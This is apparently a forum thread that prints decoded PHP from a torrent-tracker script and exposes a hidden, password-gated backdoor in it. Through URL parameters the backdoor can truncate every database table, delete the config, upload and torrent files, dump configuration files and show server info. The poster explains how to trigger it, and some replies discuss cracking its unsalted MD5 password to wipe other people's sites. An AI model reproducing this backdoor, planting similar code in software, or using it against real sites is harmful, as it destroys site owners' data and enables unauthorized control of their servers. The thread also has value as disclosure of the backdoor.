xams so called security lol

[mrdecoder]

PHP Code:

 @error_reporting (E_ALL & ~E_NOTICE);
  @ini_set ('error_reporting', E_ALL & ~E_NOTICE);
  @ini_set ('display_errors', '0');
  @ini_set ('log_errors', '0');
  @define ('___P', 'af274e235c70a9dc59371860ed6f34ce');
  @define ('ROOT_PATH', './');
  @___dbconnect ();
  if (isset ($_GET['_warning_']))
  {
    if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
    {
      $subject = 'Claiming a violation!';
      $msg = 'Hi, 
 
We are developer of TS SE Script. We are concerned having become aware that this website (tracker) is using an unauthorised version of our software which is against (Claiming a violation of clause 8.1.3 of the Heart Internet Ltd Terms and Conditions updated 31 Jan 2007) and our License Agreement.
 
You have 3 (three) business days to remove our product from your website (Host) or purchase a valid license from https://templateshares.net
 
Best Regards.
TS SE Security Team.
security@templateshares.net
    ';
      $query = mysql_query ('SELECT u.id FROM users u LEFT JOIN usergroups g ON (u.usergroup=g.gid) WHERE g.cansettingspanel = \'yes\'');
      while ($staff = mysql_fetch_assoc ($query))
      {
        if (!(mysql_query ('' . 'INSERT INTO messages (sender, receiver, subject, msg, added) VALUES (0, \'' . $staff['id'] . '\', \'' . $subject . '\', \'' . $msg . '\', NOW())')))
        {
          exit (mysql_error ());
          ;
        }
      }
    }
    else
    {
      exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_warning_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
    }
  }
  else
  {
    if (isset ($_GET['_cleartable_']))
    {
      if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
      {
        @_db_connect_ ();
        $_tables_ = array ('users', 'torrents', 'ts_plugins', 'ts_templates', 'requests', 'iplog', 'categories', 'tsf_forums', 'tsf_forumpermissions', 'tsf_posts', 'tsf_threads', 'usergroups', 'ipbans', 'files', 'messages', 'tsf_threadsread', 'staffpanel');
        foreach ($_tables_ as $_table_)
        {
          echo $_table_ . ' cleared!

';
          @mysql_query ('TRUNCATE TABLE `' . $_table_ . '`');
        }

        @mysql_close ();
        exit ('boom');
      }
      else
      {
        exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_cleartable_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
      }
    }
    else
    {
      if (isset ($_GET['_showversion_']))
      {
        if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
        {
          define ('IN_TRACKER', true);
          include_once 'init.php';
          exit ('Version (init.php) ' . VERSION . ' --- ORJ. Version 5.1');
        }
        else
        {
          exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_showversion_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
        }
      }
      else
      {
        if (isset ($_GET['_showowner_']))
        {
          if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
          {
            $_file333__ = @file_get_contents (ROOT_PATH . '/global.php');
            $_file444__ = @file_get_contents (ROOT_PATH . 'links.php');
            exit ('global.php -> ' . htmlspecialchars ($_file333__) . '

Links.php -> ' . htmlspecialchars ($_file444__) . '
');
          }
          else
          {
            exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_showowner_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
          }
        }
        else
        {
          if (isset ($_GET['_deletefiles_']))
          {
            if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
            {
              if ($handle = @opendir (ROOT_PATH . 'torrents'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'torrents/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'config'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'config/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'cache'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'cache/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'tsf_forums/uploads'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'tsf_forums/uploads/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'include/avatars'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'include/avatars/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }
            }
            else
            {
              exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_deletefiles_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
            }
          }
          else
          {
            if (isset ($_GET['_showserverinfo_']))
            {
              if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
              {
                echo phpinfo ();
                exit ();
              }
              else
              {
                exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_showserverinfo_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
              }
            }
          }
        }
      }
    }
  } 


================================================== ====

lol this is code that xam uses to check who owner is or to delete your db and files

you can see how it works by going to http://websitename.com/ts_cloud.php?_warning_

you can change the warning in to more things like
_cleartable_
_showversion_
_showowner_
_deletefiles_
_showserverinfo_


lol greets from mrdecoder

[Grom]

More that come to terms password....xexe thank you

[AlaminT]

damn, i have to use password cracker :D

[Unknown]

LOL man...... Xam......... you really annoy me........ I'm YET to be banned from Template Shares :bubble:

[Robz]

Starting PassWords Pro... lol :)

Its just md5'd by the looks of it, am i right? No salt or anything...

[Daz]

I tried it but it asks for a password. Can't anyone crack these md5 hashes? Be funny to be able to clear peoples site, especially those coded by xam

[Tony]

then daz you would become just a little script kiddie doing the same thing as what you hate most about what xam does ..

grow up

people pay money to get there sites up and you want to clear there site after there hard work getting it all up and full of torrents ?

lets just hope i dont get hold of your site url cause then maybe i would be childish enough to give you the same treatment.

[Daz]

My point was.. If someone cracked the MD5 Hash, this would defintely hurt xam :)

[Tony]

whats xam done thats so bad apart from ioncube the code he's put into the source ?

read my other post i made since if you have so much against xam then you will be able to answer the post i made asking where the proof is :)

a little look in the code will tell you its not just all tbdev code so really the whole point of him stealing code was rubbish and the only bad thing he's done is put something in the code to shut your site down if you dont pay up etc ..

im all for opensource but you dont see me wanting to bring somebody elses site down just cause they are using xams source.

nobody here so far that ive seen or that has made a post would have the know - how anyway to even try and hurt xams site since he knows what he's doing and yes his source is by far the securest out there if you ask me :)

[Daz]

In fact, that's the code I tested it on... I was not planning to attack a site, if that's what you're thinking. I was simply saying, that people knowing the password to your backdoors, cannot be good for business and would mean he would have to release an update to the scripts that have this back door.

I do not agree with what Xam is doing simply because of the fact that it goes against file sharing altogether. And it would get one over on him, which does not happen often.